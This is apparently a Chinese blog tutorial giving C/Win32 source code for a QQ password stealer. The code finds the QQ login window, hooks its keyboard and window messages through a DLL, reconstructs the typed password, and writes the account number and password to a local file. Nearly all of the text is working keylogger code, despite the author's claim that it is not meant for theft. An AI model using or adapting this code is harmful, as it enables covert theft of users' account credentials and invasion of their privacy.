(1)寻找QQ登陆界面。
(2)安装钩子
(3)钩子函数的解释.
(4)处理密码。
以下部分全是使用C语言,文章中我假设读者您是会C/SDK编程的。如果遇到相关的概念性问题,您可以查看MSDN或是上BBS 询问!
寻找QQ登陆界面
软件运行后,利用安装定时器,每秒在系统找QQ登陆界面,这样基本上只要用户打开了QQ登陆界面就会被抓住其句柄,看下面代码:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安装好TIMER后,下面是处理主程序的WM_TIMER消息,凡是出现没有定义的变量,您可以理解为是全局变量.
//处理WM_TIMER代码
if (!IsWindow(g_hQQLogin)) //判断g_hQQLogin是否是有效的窗口句柄
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //参数为NULL是卸载HOOK,参数为句柄是安装句柄
do
{
//利用FindWindowEx查找QQ登陆窗口,具体参数意思请查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //对话框的类都是#32770
//找到类名是#32770后,再在其窗体内找一个具有“ 登录QQ”的BUTTON按纽
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登录QQ"); //这一句很关键,如果你的QQ登陆窗口上没有" 登录QQ"字样,那么获取密码将失败!
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口,即:QQ登陆窗口
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安装HOOK,此函数在DLL文件中 第二部分中介绍
}
}
上面就是查找QQ登陆窗口句柄的过程,从代码可以看出我用的方法:找一个其子窗体中有一个标题为“ 登录QQ”的BUTTON的对话框(这句话说得有点饶口,这句话如果也看不懂,下面您不用看了:() 我最开始是想利用 FindWindow(NULL,"QQ用户登陆窗口")来查找,但是我用Spy++看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”,而是“乱码”,其中包含了回车键等特殊字符,于是我用了FindWindowEx().
安装钩子
找到了QQ登陆窗口后,就成功了一半。
下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL(动态连接库)?要去“钩”其他进程的消息,得让HOOK函数在DLL中,这样好映射到其地址空间中!
BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//获得登陆框的句柄
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ,此处不一样! 得到QQ号的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此处不一样!得到QQ密码的子窗口句柄
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,号码句柄都没有得到!","郁闷",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密码句柄都没有得到!","郁闷",0);
return FALSE;
}
分别键盘HOOK,和界面部分消息处理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 卸载钩子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}
上面是安装HOOK部分的代码,就这么简单,上面提到了CallWndProc,KeyboardProc是两个回调函数,是我第三部分要解释的钩子函数
钩子函数的解释
CallWndProc,KeyboardProc是两个回调函数的原型和具体代码如下:
// 钩子过程,监视“登陆”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕获“登陆”按钮
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
//当用户点了登陆按钮,说明QQ号码和QQ密码已经填写完毕,当然可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
// 键盘钩子过程,监视“登陆”的热键消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕获热键消息,记录键盘的按键盘过程,pmsg是PMSG类型的,i是全局Static类型的
pmsg[i].wParam =wParam;
i++;
if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容
处理密码
如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量
第一个:QQ号的子窗口句柄 g_hNum
第二个:QQ密码的子窗口句柄 g_hPsw //此部分暂时不使用,下面
第三个:存键盘按键的 pmsg
上面三变量分别出现在第二部分和第三部分,都是全局共享(shared)变量
QQ密码的子窗口句柄 g_hPsw 此部分暂时不使用,你可以看到下面代码中有句用到g_hPsw的语句是我注释掉了的,原因是无法通过那样去得到QQ密码,得处理按键消息
void GetPasswrod()
{
//声明变量和初始化
HANDLE f;
TCHAR num[13];
TCHAR psw[21];
TCHAR total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
DWORD dw;
//得到QQ号的内容,以为有的人的QQ号是在登陆框有记录,其QQ号并是用键盘输入的
GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,无法这样获得密码
//提取出键盘记录,此内容也许全是密码,也许是QQ号+QQ密码
for(j=0;j<20;j++)
{
psw[j]=(TCHAR)pmsg[j*2].wParam ;
}
psw[j+1]=’\0’;
//把QQ号码和QQ密码写入C盘password.txt中
f=CreateFile("c:\\password.txt",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
strcat(total,"号码");
strcat(total,num);
strcat(total,"密码:");
strcat(total,psw);
WriteFile(f,&total,sizeof(total),&dw,NULL);
CloseHandle(f);
}
最后在C盘password.txt也许会出现这样两种情况:
1)当QQ号是没有用输入,而已用的粘贴或者是电脑以前有记录则是:号码:21728812密码:TEST
2) 当QQ号是用的键盘输入,电脑没有QQ号记录时则是: 号码:21728812密码:21728812TEST
可以看出,第2种情况把QQ当成了密码了,所以密码还得减去QQ号,
特别说明:我这样直接处理wParam参数,得到的字符密码全是大写的,具体大小写问题我没有就没有仔细去处理的,功能实现就行了,毕竟我使用他不用来盗密码的!
上面四部分基本上获得密码的功能介绍完毕。凡是没有介绍的变量皆是全局变量,没有提到的函数如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile()等皆是Windows API,详细使用说明请查MSDN(http://www.msdn.com),我提到的“HOOK”,“钩子”是同一个意思,也许有的地方我说的钩子函数,而另外一个地方说的是HOOK函数
特别说明:上面有具体的运行文件,由于小弟并没有考虑到更多细节,我只是用了“理想”状况下去获得密码,并且或的密码后并没有注重后期密码处理,也许出现密码大小写不符合或是无法得到密码,请大家千万别笑话,我写这篇菜鸟级别的Blog的原因意在告诉一些对这方面感到疑惑的朋友基本的原理,和希望和大侠们交流 !
2022-01-12 / 43.3M
2022-01-12 / 40.8M
2022-01-12 / 76.5M
2022-01-12 / 23.4M
2022-01-12 / 22.7M
2022-01-12 / 17.4M